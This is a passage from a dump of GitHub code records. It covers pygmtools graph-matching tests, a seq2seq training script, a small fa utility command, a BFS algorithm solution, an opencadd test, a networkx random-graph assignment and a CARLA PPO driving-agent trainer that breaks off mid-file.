[functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1), pygm.utils.inner_prod_aff_fn]\n }, backends)\n\n\ndef test_gamgm():\n num_nodes = 5\n num_graphs = 10\n # test without outliers\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.gamgm, 'kb-qap', {\n 'sk_init_tau': [0.5, 0.1],\n 'sk_min_tau': [0.1, 0.05],\n 'param_lambda': [0.1, 0.5],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1), pygm.utils.inner_prod_aff_fn],\n 'verbose': [True]\n }, backends)\n\n # test with outliers\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.gamgm, 'kb-qap', {\n 'sk_init_tau': [0.5],\n 'sk_gamma': [0.8],\n 'sk_min_tau': [0.1],\n 'param_lambda': [0.],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1)],\n 'verbose': [True],\n 'n_univ': [10],\n 'outlier_thresh': [0., 0.1],\n 'ns': [np.array([num_nodes] * (num_graphs // 2) + [num_nodes - 1] * (num_graphs - num_graphs // 2))],\n }, backends)\n\n\ndef test_gamgm_backward():\n # Pytorch\n pygm.BACKEND = 'pytorch'\n torch.manual_seed(1)\n\n # Generate 10 isomorphic graphs\n graph_num = 10\n As, X_gt, Fs = pygm.utils.generate_isomorphic_graphs(node_num=4, graph_num=10, node_feat_dim=20)\n\n # Compute node-wise similarity by inner-product and Sinkhorn\n W = torch.matmul(Fs.unsqueeze(1), Fs.transpose(1, 2).unsqueeze(0))\n W = pygm.sinkhorn(W.reshape(graph_num ** 2, 4, 4)).reshape(graph_num, graph_num, 4, 4)\n\n # This function is differentiable by the black-box trick\n W.requires_grad_(True) # tell PyTorch to track the gradients\n X = pygm.gamgm(As, W)\n matched = 0\n for i, j in itertools.product(range(graph_num), repeat=2):\n matched += (X[i, j] * X_gt[i, j]).sum()\n acc = matched / X_gt.sum()\n\n # Backward pass via black-box trick\n acc.backward()\n assert torch.sum(W.grad != 0) > 0\n\n # Jittor\n if os_name == 'Linux':\n pygm.BACKEND = 'jittor'\n jt.set_global_seed(2)\n\n # Generate 10 isomorphic graphs\n graph_num = 10\n As, X_gt, Fs = pygm.utils.generate_isomorphic_graphs(node_num=4, graph_num=10, node_feat_dim=20)\n\n # Compute node-wise similarity by inner-product and Sinkhorn\n W = jt.matmul(Fs.unsqueeze(1), Fs.transpose(1, 2).unsqueeze(0))\n W = pygm.sinkhorn(W.reshape(graph_num ** 2, 4, 4)).reshape(graph_num, graph_num, 4, 4)\n\n # This function is differentiable by the black-box trick\n class Model(jt.nn.Module):\n def __init__(self, W):\n self.W = W\n\n def execute(self, As):\n X = pygm.gamgm(As, self.W)\n return X\n\n W.start_grad()\n model = Model(W)\n X = model(As)\n matched = 0\n for i, j in itertools.product(range(graph_num), repeat=2):\n matched += (X[i, j] * X_gt[i, j]).sum()\n acc = matched / X_gt.sum()\n\n # Backward pass via black-box trick\n optim = jt.nn.SGD(model.parameters(), lr=0.1)\n optim.step(acc)\n grad = W.opt_grad(optim)\n print(jt.sum(grad != 0))\n assert jt.sum(grad != 0) > 0\n\n\nif __name__ == '__main__':\n test_gamgm_backward()\n test_gamgm()\n test_mgm_floyd()\n test_cao()\n","repo_name":"Thinklab-SJTU/pygmtools","sub_path":"tests/test_multi_graph_solvers.py","file_name":"test_multi_graph_solvers.py","file_ext":"py","file_size_in_byte":13164,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"78"} +{"seq_id":"72034286971","text":"import json\nimport logging\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom tensorboardX import SummaryWriter\nfrom torch.nn.utils import clip_grad_norm_\nfrom torchtext import data\nfrom tqdm import tqdm\n\nimport config\nfrom dataprocessor import DataPreprocessor\nfrom model import Seq2Seq\nfrom utils import MetricReporter, dress_for_loss, correct_tokens, save_checkpoint\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\"\n\nprepro_params = {\n \"word_embedding_size\": config.word_embedding_size,\n \"question_embedding_size\": config.question_embedding_size,\n \"max_len_context\": config.max_len_context,\n \"max_len_question\": config.max_len_question,\n}\n\nhyper_params = {\n \"cuda\": config.cuda,\n \"batch_size\": config.batch_size,\n \"pretrained\": config.pretrained,\n \"learning_rate\": config.learning_rate,\n \"num_epochs\": config.num_epochs,\n \"start_decay_epoch\": config.start_decay_epoch,\n \"decay_rate\": config.decay_rate,\n \"drop_prob\": config.drop_prob,\n \"hidden_size\": config.hidden_size,\n \"num_layers\": config.num_layers\n # TO DO\n}\n\nexperiment_params = {\"preprocessing\": prepro_params, \"model\": hyper_params}\n# seting the cuda\ndevice = torch.device(\"cuda\" if hyper_params[\"cuda\"] else \"cpu\")\ntorch.manual_seed(35)\n\n# seting the a path to save the experiment log\nexperiment_path = \"./output/{}\".format(config.exp)\nif not os.path.exists(experiment_path):\n os.mkdir(experiment_path)\n\n# save the preprocesisng and model parameters used for this training experiment\nwith open(os.path.join(experiment_path, \"config_{}.json\".format(config.exp)), \"w\") as f:\n json.dump(experiment_params, f)\n\n# start TensorboardX writer\nwriter = SummaryWriter(experiment_path)\n\n# preprocess the data\ndp = DataPreprocessor()\ntrain_dataset, dev_dataset, vocabs = dp.load_data(os.path.join(config.out_file, \"train_dataset.pt\"),\n os.path.join(config.out_file, \"dev_dataset.pt\"),\n config.glove)\n\n# using the dataloader to feed data\ntrain_dataloader = data.BucketIterator(train_dataset,\n batch_size=hyper_params[\"batch_size\"],\n sort_key=lambda x: len(x.src),\n sort_within_batch=True,\n device=device,\n shuffle=True)\n\ndev_dataloader = data.BucketIterator(dev_dataset,\n batch_size=hyper_params[\"batch_size\"],\n sort_key=lambda x: len(x.src),\n sort_within_batch=True,\n device=device,\n shuffle=True)\n\nlogger.info(\"Length of training data loader is:{}\".format(len(train_dataloader)))\nlogger.info(\"Length of valid data loader is:{}\".format(len(dev_dataloader)))\n\n# TO DO\nmodel = Seq2Seq(src_vocab=vocabs[\"src_vocab\"],\n hidden_size=hyper_params[\"hidden_size\"],\n num_layers=hyper_params[\"num_layers\"],\n tgt_vocab=vocabs['tgt_vocab'],\n device=device,\n drop_out=hyper_params[\"drop_prob\"])\n\nmodel.to(device)\n# resume training if checkpoint\nif hyper_params[\"pretrained\"]:\n model.load_state_dict(torch.load(os.path.join(experiment_path, \"model.pkl\"))[\"state_dict\"])\n\n# set the loss function and reduce the mask loss\npadding_idx = vocabs['tgt_vocab'].stoi[\"<PAD>\"]\ncriterion = nn.NLLLoss(ignore_index=padding_idx, reduction=\"sum\")\noptimizer = torch.optim.SGD(model.parameters(), hyper_params[\"learning_rate\"])\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=list(range(hyper_params[\"start_decay_epoch\"],\n hyper_params[\"num_epochs\"] + 1)),\n gamma=hyper_params[\"decay_rate\"])\n\n# save the best model to continue learning\nif hyper_params[\"pretrained\"]:\n best_valid_loss = torch.load(os.path.join(experiment_path, \"model.pkl\"))[\"best_valid_loss\"]\n epoch_checkpoint = torch.load(os.path.join(experiment_path, \"model_last_checkpoint.pkl\"))[\"epoch\"]\n logger.info(\"Best validation loss obtained after {} epochs is: {}\".format(epoch_checkpoint, best_valid_loss))\nelse:\n best_valid_loss = 10000 # large number\n epoch_checkpoint = 1\n\n# create an object to report the different metrics\nmc = MetricReporter()\n\n# train the model\nlogging.info(\"Starting training...\")\nfor epoch in range(hyper_params[\"num_epochs\"]):\n logging.info(\"##### epoch {:2d}\".format(epoch))\n model.train()\n mc.train()\n print(\"lr is\", scheduler.get_lr())\n for i, batch in enumerate(tqdm(train_dataloader)):\n sentence, len_sentence, question, len_question = batch.src[0].to(device), batch.src[1].to(device), batch.tgt[\n 0].to(device), batch.tgt[1].to(device)\n optimizer.zero_grad()\n\n pred = model(sentence, len_sentence, question, len_question)\n pred = dress_for_loss(pred)\n # calculate Loss\n loss = criterion(pred.view(-1, pred.size(2)), question[:, 1:].contiguous().view(-1))\n\n # update the metrics\n num_non_padding, num_correct = correct_tokens(pred, question, padding_idx)\n mc.update_metrics(loss.item(), num_non_padding, num_correct)\n\n loss.backward()\n\n clip_grad_norm_(model.parameters(), 5.)\n\n optimizer.step()\n scheduler.step()\n\n # compute the loss, accuracy and perplexity for this epoch and push them to TensorboardX\n mc.report_metrics()\n writer.add_scalars(\"train\", {\"loss\": mc.list_train_loss[-1],\n \"accuracy\": mc.list_train_accuracy[-1],\n \"perplexity\": mc.list_train_perplexity[-1],\n \"epoch\": mc.epoch})\n\n model.eval()\n mc.eval()\n with torch.no_grad():\n for i, batch in enumerate(tqdm(dev_dataloader)):\n # load a batch of input sentence, sentence lengths and questions\n sentence, len_sentence, question, len_question = batch.src[0].to(device), batch.src[1].to(device), \\\n batch.tgt[0].to(device), batch.tgt[1].to(device)\n\n pred = model(sentence, len_sentence, question, len_question)\n\n pred = dress_for_loss(pred)\n\n loss = criterion(pred.view(-1, pred.size(2)), question[:, 1:].contiguous().view(-1))\n\n num_non_padding, num_correct = correct_tokens(pred, question, padding_idx)\n mc.update_metrics(loss.item(), num_non_padding, num_correct)\n\n mc.report_metrics()\n writer.add_scalars(\"valid\", {\"loss\": mc.list_valid_loss[-1],\n \"accuracy\": mc.list_valid_accuracy[-1],\n \"perplexity\": mc.list_valid_perplexity[-1],\n \"epoch\": mc.epoch})\n\n # save last model weights\n save_checkpoint({\n \"epoch\": mc.epoch + epoch_checkpoint,\n \"state_dict\": model.state_dict(),\n \"best_valid_loss\": mc.list_valid_loss[-1],\n }, True, os.path.join(experiment_path, \"model_last_checkpoint.pkl\"))\n\n # save model weights with best validation error\n is_best = bool(mc.list_valid_loss[-1] < best_valid_loss)\n best_valid_loss = min(mc.list_valid_loss[-1], best_valid_loss)\n save_checkpoint({\n \"epoch\": mc.epoch + epoch_checkpoint,\n \"state_dict\": model.state_dict(),\n \"best_valid_loss\": best_valid_loss\n }, is_best, os.path.join(experiment_path, \"model.pkl\"))\n\n# export scalar data to TXT file for external processing and analysis\nmc.log_metrics(os.path.join(experiment_path, \"train_log.txt\"))\n","repo_name":"Aleczhang13/learning_to_ask_question","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"41554245170","text":"from argparse import RawTextHelpFormatter\nfrom fa import utils\n\nDESCRIPTION = '''make the resultset unique\n\nEXAMPLE:\n results = [0, 4, 8, 8, 12]\n -> unique\n result = [0, 4, 8, 12]\n'''\n\n\ndef get_parser():\n p = utils.ArgumentParserNoExit('unique',\n description=DESCRIPTION,\n formatter_class=RawTextHelpFormatter)\n return p\n\n\ndef run(segments, args, addresses, interpreter=None, **kwargs):\n return list(set(addresses))\n","repo_name":"doronz88/fa","sub_path":"fa/commands/unique.py","file_name":"unique.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"78"} +{"seq_id":"15421624100","text":"# 백준 - 실버2 - 알고리즘 수업 너비 우선 탐색 1 - 24444 - 그래프, 정렬, bfs 문제\n'''\n그래프, 정렬, bfs 문제\n\nbfs 풀 듯이 문제를 풀어야 되는데 그래프를 정렬한 뒤 풀어야 된다.\n문제에 나와있듯이 정렬한 뒤에 제출해야 통과한다. 처음에 정렬을 안하고 '틀렸습니다.' 가 나와서 당황했다.\n'''\n\nfrom collections import deque\nimport sys; input=sys.stdin.readline # Python3 로 제출하려면 필요 \n\nn, m, r = map(int, input().split())\ng = [ [] for _ in range(n + 1) ]\n\nfor _ in range(m):\n a, b = map(int, input().split())\n g[a].append(b)\n g[b].append(a)\n\nfor i in range(n + 1):\n g[i].sort()\n\nck = [0] * (n + 1)\ncnt = 1\n\ndef bfs(x):\n global cnt\n q = deque([x])\n ck[x] = 1\n cnt += 1\n\n while q:\n a = q.popleft()\n\n for i in g[a]:\n if ck[i] == 0:\n ck[i] = cnt\n cnt += 1\n q.append(i)\n\nbfs(r)\nfor i in ck[1:]:\n print(i)","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/Silver_2/알고리즘_수업_너비_우선_탐색_1_24444.py","file_name":"알고리즘_수업_너비_우선_탐색_1_24444.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4701882639","text":"\"\"\"\nTests for opencadd.structure.pocket.region\n\"\"\"\n\nimport pandas as pd\nimport pytest\n\nfrom opencadd.structure.pocket import Region\n\n\nclass TestRegion:\n \"\"\"\n Test TestRegion class methods.\n \"\"\"\n\n @pytest.mark.parametrize(\n \"name, residue_ids, residue_ixs, color\",\n [(\"example\", [1, 2], [10, 20], \"blue\")],\n )\n def test_attributes_and_properties(self, name, residue_ids, residue_ixs, color):\n region = Region(name, residue_ids, residue_ixs, color)\n assert region.name == name\n assert region.residue_ids == residue_ids\n assert region.residue_ixs == residue_ixs\n assert region.color == color\n assert isinstance(region.region, pd.DataFrame)\n assert region.region.columns.to_list() == [\n \"region.name\",\n \"region.color\",\n \"residue.id\",\n \"residue.ix\",\n ]\n","repo_name":"volkamerlab/opencadd","sub_path":"opencadd/tests/structure/test_pocket_region.py","file_name":"test_pocket_region.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"78"} +{"seq_id":"36736858539","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import combinations\r\nimport random\r\nfrom tqdm import tqdm\r\nimport math\r\n\r\n\r\ndef random_combination(iterable, r):\r\n # This function is taken from python itertools documentation - recipes section\r\n \"Random selection from itertools.combinations(iterable, r)\"\r\n pool = tuple(iterable)\r\n n = len(pool)\r\n indices = sorted(random.sample(range(n), r))\r\n return tuple(pool[i] for i in indices)\r\n\r\n\r\ndef lar_and_small_cliq(G):\r\n # This function is already something used in previous assignments\r\n cliq_len = []\r\n max_count = 0\r\n min_count = 0\r\n for cliq in list(nx.find_cliques(G)):\r\n cliq_len.append(len(cliq))\r\n\r\n for i in cliq_len:\r\n if i == max(cliq_len):\r\n max_count += 1\r\n elif i == min(cliq_len):\r\n min_count += 1\r\n\r\n print(\" Largest clique - Size: \",\r\n max(cliq_len), \", Number: \", max_count)\r\n print(\" Smallest clique - Size: \",\r\n min(cliq_len), \", Number: \", min_count)\r\n\r\n\r\ndef generate_many():\r\n print(\"Generating random graphs with different sizes...\")\r\n for i in tqdm(range(100, 100000, 1000)):\r\n G = nx.erdos_renyi_graph(i, 0.5)\r\n degrees = [G.degree(node) for node in G.nodes]\r\n plt.hist(degrees, alpha=0.5)\r\n\r\n print(\"Generating scale-free graphs with different sizes...\")\r\n for i in tqdm(range(100, 100000, 1000)):\r\n G = nx.barabasi_albert_graph(i, i-10)\r\n degrees = [G.degree(node) for node in G.nodes]\r\n plt.hist(degrees, alpha=0.5)\r\n\r\n plt.show()\r\n\r\n\r\ndef generate_NL(n, l):\r\n V = set([v for v in range(n)])\r\n E = set()\r\n\r\n while len(E) < l:\r\n E.add(random_combination(V, 2))\r\n\r\n G = nx.Graph()\r\n G.add_nodes_from(V)\r\n G.add_edges_from(E)\r\n\r\n return G\r\n\r\n\r\ndef generate_NP(n, p):\r\n V = set([v for v in range(n)])\r\n E = set()\r\n for combination in combinations(V, 2):\r\n a = random.random()\r\n if a < p:\r\n E.add(combination)\r\n\r\n G = nx.Graph()\r\n G.add_nodes_from(V)\r\n G.add_edges_from(E)\r\n\r\n return G\r\n\r\n\r\ndef analysis(G_rn, G_sf):\r\n\r\n print(\"Random Network\")\r\n print(\" Number of nodes: \", len(G_rn.nodes))\r\n print(\" Number of edges: \", len(G_rn.edges))\r\n print(\" Number of components: \", nx.number_connected_components(G_rn))\r\n\r\n sum_rn = 0\r\n for node in G_rn.nodes:\r\n sum_rn += G_rn.degree(node)\r\n\r\n avg_rn = sum_rn/len(G_rn.nodes)\r\n print(\" Average Degree: \", avg_rn)\r\n\r\n tri_rn = nx.triangles(G_rn)\r\n notri_rn = sum(tri_rn.values())//3\r\n print(\" Number of triangles: \", notri_rn)\r\n\r\n try:\r\n print(\" Diameter: \", nx.diameter(G_rn))\r\n except nx.exception.NetworkXError:\r\n print(\" Diameter: \", float(math.inf))\r\n\r\n print(\" Clustering coefficient: \", nx.average_clustering(G_rn))\r\n lar_and_small_cliq(G_rn)\r\n\r\n print(\"Scale-free network\")\r\n print(\" Number of nodes: \", len(G_sf.nodes))\r\n print(\" Number of edges: \", len(G_sf.edges))\r\n print(\" Number of components: \", nx.number_connected_components(G_sf))\r\n\r\n sum_sf = 0\r\n for node in G_sf.nodes:\r\n sum_sf += G_sf.degree(node)\r\n\r\n avg_sf = sum_sf/len(G_sf.nodes)\r\n print(\" Average Degree: \", avg_sf)\r\n\r\n tri_sf = nx.triangles(G_sf)\r\n notri_sf = sum(tri_sf.values())//3\r\n print(\" Number of triangles: \", notri_sf)\r\n\r\n try:\r\n print(\" Diameter: \", nx.diameter(G_sf))\r\n except nx.exception.NetworkXError:\r\n print(\" Diameter: \", float(math.inf))\r\n\r\n print(\" Clustering coefficient: \", nx.average_clustering(G_sf))\r\n lar_and_small_cliq(G_sf)\r\n\r\n # Degree distribution\r\n degrees_rn = [G_rn.degree(node) for node in G_rn.nodes]\r\n degrees_sf = [G_sf.degree(node) for node in G_sf.nodes]\r\n plt.hist(degrees_rn, alpha=0.5, label='Random')\r\n plt.hist(degrees_sf, alpha=0.5, label='Scale-free')\r\n plt.legend(loc='upper right')\r\n plt.title('Degree distribution')\r\n print()\r\n print(\"Degree distributions plotted\")\r\n plt.show()\r\n\r\n\r\ndef main():\r\n print(\"Generate network from (N, L) or (N, P)\")\r\n print(\"Enter '1' for (N, L) and '2' for (N, P)\")\r\n method = int(input(\"Answer: \"))\r\n\r\n if method == 1:\r\n print(\"======================================================\")\r\n print(\" Random graph with N and L \")\r\n print(\"------------------------------------------------------\")\r\n n = int(input(\"Give number of nodes: \"))\r\n l = int(input(\"Give number of edges: \"))\r\n G = generate_NL(n, l)\r\n print(\"Graph generated with given N and L\")\r\n\r\n elif method == 2:\r\n print(\"======================================================\")\r\n print(\" Random graph with N and P \")\r\n print(\"------------------------------------------------------\")\r\n n = int(input(\"Give number of nodes: \"))\r\n p = float(input(\"Give p: \"))\r\n G = generate_NP(n, p)\r\n print(\"Graph generated with given N and P\")\r\n\r\n print(\"======================================================\")\r\n print(\" Question 3 \")\r\n print(\"------------------------------------------------------\")\r\n G_rn = nx.erdos_renyi_graph(100, 0.5)\r\n G_sf = nx.barabasi_albert_graph(100, 90)\r\n analysis(G_rn, G_sf)\r\n\r\n print(\"======================================================\")\r\n print(\" Question 2 \")\r\n print(\"------------------------------------------------------\")\r\n generate_many()\r\n\r\n print(\"======================================================\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"saurabhburewar/Data-and-Networks_SNA","sub_path":"RandomAndScaleFree/B18CSE050_assignment4.py","file_name":"B18CSE050_assignment4.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34509931282","text":"# Code inspired by the minimal PPO implementation of Nikhil Barhate https://github.com/nikhilbarhate99/PPO-PyTorch\n\nimport glob\nimport os\nimport sys\n\ntry:\n sys.path.append(glob.glob('PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n print(\"could not find the CARLA egg\")\n pass\ntry:\n sys.path.append(glob.glob('../PythonAPI')[0])\n sys.path.append(glob.glob('../bird_view')[0])\n sys.path.append(glob.glob('../')[0])\nexcept IndexError as e:\n pass\nfrom configparser import ConfigParser\nfrom pathlib import Path\n\nimport carla\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nimport random\n\nfrom benchmark import make_suite\nfrom bird_view.utils import carla_utils as cu\nfrom training.phase2_utils import setup_image_model\nfrom training.ppo_utils.agent import PPOImageAgent\nfrom training.ppo_utils.critic import BirdViewCritic, BirdViewCritic2, BirdViewCritic3\nfrom training.ppo_utils.replay_buffer import PPOReplayBuffer\nfrom training.ppo_utils.helpers import rtgs, gae, _paint, get_reward\nfrom tensorboardX import SummaryWriter\n\nGAP = 5\nN_STEP = 5\nCROP_SIZE = 192\nMAP_SIZE = 320\nSAVE_EPISODES = list(range(20))\n\n\ndef crop_birdview(birdview, dx=0, dy=0):\n x = 260 - CROP_SIZE // 2 + dx\n y = MAP_SIZE // 2 + dy\n\n birdview = birdview[\n x - CROP_SIZE // 2:x + CROP_SIZE // 2,\n y - CROP_SIZE // 2:y + CROP_SIZE // 2]\n\n return birdview\n\n\ndef one_hot(x, num_digits=4, start=1):\n N = x.size()[0]\n x = x.long()[:, None] - start\n x = torch.clamp(x, 0, num_digits - 1)\n y = torch.FloatTensor(N, num_digits)\n y.zero_()\n y.scatter_(1, x, 1)\n return y\n\n\ndef rollout(replay_buffer, image_agent, critic, episode, total_time_steps, max_rollout_length=4000,\n rollouts_per_episode=5, port=2000,\n planner=\"new\", show=False, include_hero=False, writer=None, **kwargs):\n progress = tqdm(range(max_rollout_length * rollouts_per_episode), desc='Frame')\n data = [[] for _ in range(rollouts_per_episode)]\n\n with make_suite('NoCrashTown01-v1', port=port, planner=planner) as env:\n env.col_threshold = 200\n time_steps = total_time_steps\n for i in range(rollouts_per_episode):\n print(\"Episode\", episode, \", rollout\", i)\n start, target = env.pose_tasks[np.random.randint(len(env.pose_tasks))]\n env_params = {\n 'weather': np.random.choice(list(cu.TRAIN_WEATHERS.keys())),\n 'start': start,\n 'target': target,\n 'n_pedestrians': random.randint(100, 250),\n 'n_vehicles': random.randint(60, 120),\n }\n\n env.init(**env_params)\n env.success_dist = 5.0\n env.tick()\n\n total_rewards = 0\n\n stuck_steps = 0\n while not env.is_success() and not env.collided and \\\n len(data[i]) <= max_rollout_length:\n observations = env.get_observations(include_hero=include_hero)\n\n control, action, action_logprobs = image_agent.run_step(observations)\n\n diagnostic = env.apply_control(control)\n env.tick()\n\n rgb_img = observations[\"rgb\"].copy()\n command = int(observations[\"command\"])\n speed = np.linalg.norm(observations[\"velocity\"])\n\n next_waypoint_location = env._next # Get the location of the next waypoint\n player_location = env._player.get_location()\n distance = player_location.distance(next_waypoint_location)\n\n birdview_img = crop_birdview(observations[\"birdview\"], dx=-10)\n state_value = critic.evaluate(*critic.prepare_data(birdview_img, speed, command))\n\n reward, lateral_deviation = get_reward(env, speed, **kwargs)\n is_terminal = env.collided or env.is_failure() or env.is_success()\n\n if speed <= 0.03 and not env._player.is_at_traffic_light():\n stuck_steps += 1\n else:\n stuck_steps = 0\n\n if stuck_steps >= 200:\n print(\"Stopping rollout. Stuck in same place for too long.\")\n is_terminal = True\n if distance > 45:\n print(\"Stopping rollout. Drove too far away from next checkpoint.\")\n is_terminal = True\n if lateral_deviation > 5:\n print(\"Stopping rollout. Lateral deviation to large\")\n is_terminal = True\n if len(data) + 1 >= max_rollout_length:\n print(\"Stopping rollout. Reached max rollout length.\")\n is_terminal = True\n\n if time_steps % 30 == 0:\n env.move_spectator_to_player()\n\n data[i].append({\n 'state': {\n 'rgb_img': rgb_img,\n 'command': command,\n 'speed': speed,\n 'birdview_img': birdview_img,\n 'state_value': state_value\n },\n 'action': action,\n 'action_logprobs': action_logprobs,\n 'reward': reward,\n 'is_terminal': is_terminal\n })\n total_rewards += reward\n progress.update(1)\n time_steps += 1\n if time_steps % image_agent.action_std_decay_frequency == 0:\n image_agent.decay_action_std()\n if show:\n _paint(observations, control, diagnostic, reward, image_agent.action_std, image_agent.debug, env,\n lateral_deviation, distance)\n\n if is_terminal:\n break\n\n print(\"Collided: \", env.collided)\n print(\"Success: \", env.is_success())\n env.clean_up()\n\n if writer is not None:\n writer.add_scalar(\"Rollout reward\", total_rewards, (episode * rollouts_per_episode + i))\n\n env_settings = env._world.get_settings()\n env_settings.no_rendering_mode = True\n env._world.apply_settings(env_settings)\n for rollout_data in data:\n for datum in rollout_data:\n replay_buffer.add_data(**datum)\n return total_rewards, time_steps\n\n\ndef update(log_dir, replay_buffer, image_agent, optimizer, device, episode, critic, critic_criterion,\n epoch_per_episode=5, gamma=0.99, lmbda=0.5, clip_ratio=0.05, c1=1.0, c2=0.01, batch_size=24, num_workers=0,\n critic_writer=None):\n def to_tensor(x):\n return torch.tensor(x, dtype=torch.float32).to(device)\n\n # Retrieve rewards, terminal states and state values from the rollout(s)\n rewards = replay_buffer.get_rewards()\n terminals = replay_buffer.get_is_terminals()\n values = to_tensor(replay_buffer.get_state_values())\n\n # Calculate advantages using generalized advantage estimation (GAE)\n advantages = to_tensor(gae(rewards, terminals, values, gamma=gamma, lmbda=lmbda, normalize=True))\n\n # Calculate rewards-to-go, used later when calculating loss for the critic\n rewards_to_go = to_tensor(rtgs(rewards, terminals, gamma, normalize=True))\n\n loader = torch.utils.data.DataLoader(replay_buffer, batch_size=batch_size, num_workers=num_workers,\n pin_memory=False, shuffle=True, drop_last=True)\n\n # Connecting to server to prevent timout\n # client = carla.Client(\"localhost\", 2000)\n # client.set_timeout(30)\n # cu.set_sync_mode(client, False)\n # world = client.load_world(\"town01\")\n print(\"Training on {} examples\".format(len(replay_buffer)))\n for epoch in range(epoch_per_episode):\n # world.wait_for_tick()\n desc = \"Episode {}, epoch {}\".format(episode, epoch)\n running_critic_loss = 0\n for i, (idxes, rgb, speed, command, birdview, old_actions, old_logprobs) in tqdm(enumerate(loader), desc=desc):\n # Unpack old_states into RGB, birdview, speed and command.\n rgb = rgb.to(device).float()\n birdview = birdview.to(device).float()\n speed = speed.to(device).float()\n command = one_hot(command).to(device).float()\n\n # Calculate log probability of old actions on the new policy and retrieve entropy of distribution\n logprobs, dist_entropy = image_agent.evaluate(rgb, speed, command, old_actions)\n\n # Calculate ratio between new and old policy\n ratios = torch.exp(logprobs - old_logprobs)\n\n # Evaluate state values with the critic\n state_values, _ = critic(birdview, speed, command)\n state_values = state_values.squeeze()\n\n # PPO objective function\n surr1 = ratios * advantages[idxes]\n surr2 = torch.clamp(ratios, 1 - clip_ratio, 1 + clip_ratio) * advantages[idxes]\n objective = torch.min(surr1, surr2)\n\n # Critic loss\n critic_loss = critic_criterion(state_values, rewards_to_go[idxes])\n\n # Compute loss\n loss = - objective + c1 * critic_loss - c2 * dist_entropy\n\n # Take gradient step\n optimizer.zero_grad()\n loss.mean().backward()\n optimizer.step()\n\n # Running loss for critic\n running_critic_loss += critic_loss.item() * rgb.size(0)\n\n epoch_critic_loss = running_critic_loss / len(replay_buffer)\n if critic_writer is not None:\n if episode == 0:\n epoch_write_number = epoch\n else:\n epoch_write_number = epoch_per_episode * episode + epoch\n critic_writer.add_scalar(\"Critic loss\", epoch_critic_loss, epoch_write_number)\n # cu.set_sync_mode(client, False)\n\n # Set the new policy as the old policy\n image_agent.policy_old.load_state_dict(image_agent.model.state_dict())\n\n # Save models\n torch.save(image_agent.model.state_dict(), str(Path(log_dir) / ('actor-%d.th' % episode)))\n torch.save(critic.state_dict(), str(Path(log_dir) / ('critic-%d.th' % episode)))\n\n\ndef main():\n config = ConfigParser()\n config.read(\"training/ppo_config/template.cfg\")\n\n # SETUP\n log_dir = str(config[\"SETUP\"][\"log_dir\"])\n port = int(config[\"SETUP\"][\"port\"])\n device = str(config[\"SETUP\"][\"device\"])\n batch_size = int(config[\"SETUP\"][\"batch_size\"])\n num_workers = int(config[\"SETUP\"][\"num_workers\"])\n resume_episode = int(config[\"SETUP\"][\"resume_episode\"])\n computer_vision = str(config[\"SETUP\"][\"computer_vision\"])\n show = str(config[\"SETUP\"][\"show\"]) == \"True\"\n\n # TRAINING (Hyperparameters)\n max_episode = int(config[\"TRAINING\"][\"max_episode\"])\n max_rollout_length = int(config[\"TRAINING\"][\"max_rollout_length\"])\n rollouts_per_episode = int(config[\"TRAINING\"][\"rollouts_per_episode\"])\n epoch_per_episode = int(config[\"TRAINING\"][\"epoch_per_episode\"])\n clip_ratio = float(config[\"TRAINING\"][\"clip_ratio\"])\n gamma = float(config[\"TRAINING\"][\"gamma\"])\n lmbda = float(config[\"TRAINING\"][\"lambda\"])\n c1 = float(config[\"TRAINING\"][\"c1\"])\n c2 = float(config[\"TRAINING\"][\"c2\"])\n\n # REWARD\n alpha = float(config[\"REWARD\"][\"alpha\"])\n beta = float(config[\"REWARD\"][\"beta\"])\n phi = float(config[\"REWARD\"][\"phi\"])\n delta = float(config[\"REWARD\"][\"delta\"])\n\n # AGENT\n action_std = float(config[\"AGENT\"][\"action_std\"])\n min_action_std = float(config[\"AGENT\"][\"min_action_std\"])\n action_std_decay_rate = float(config[\"AGENT\"][\"decay_rate\"])\n action_std_decay_frequency = float(config[\"AGENT\"][\"decay_frequency\"])\n\n # ACTOR\n actor_ckpt = str(config[\"ACTOR\"][\"actor_ckpt\"])\n actor_lr = float(config[\"ACTOR\"][\"learning_rate\"])\n actor_imagenet_pretrained = str(config[\"ACTOR\"][\"imagenet_pretrained\"]) == True\n actor_backbone = str(config[\"ACTOR\"][\"backbone\"])\n\n # CRITIC\n critic_ckpt = str(config[\"CRITIC\"][\"critic_ckpt\"])\n critic_lr = float(config[\"CRITIC\"][\"learning_rate\"])\n critic_backbone = str(config[\"CRITIC\"][\"backbone\"])\n include_hero = 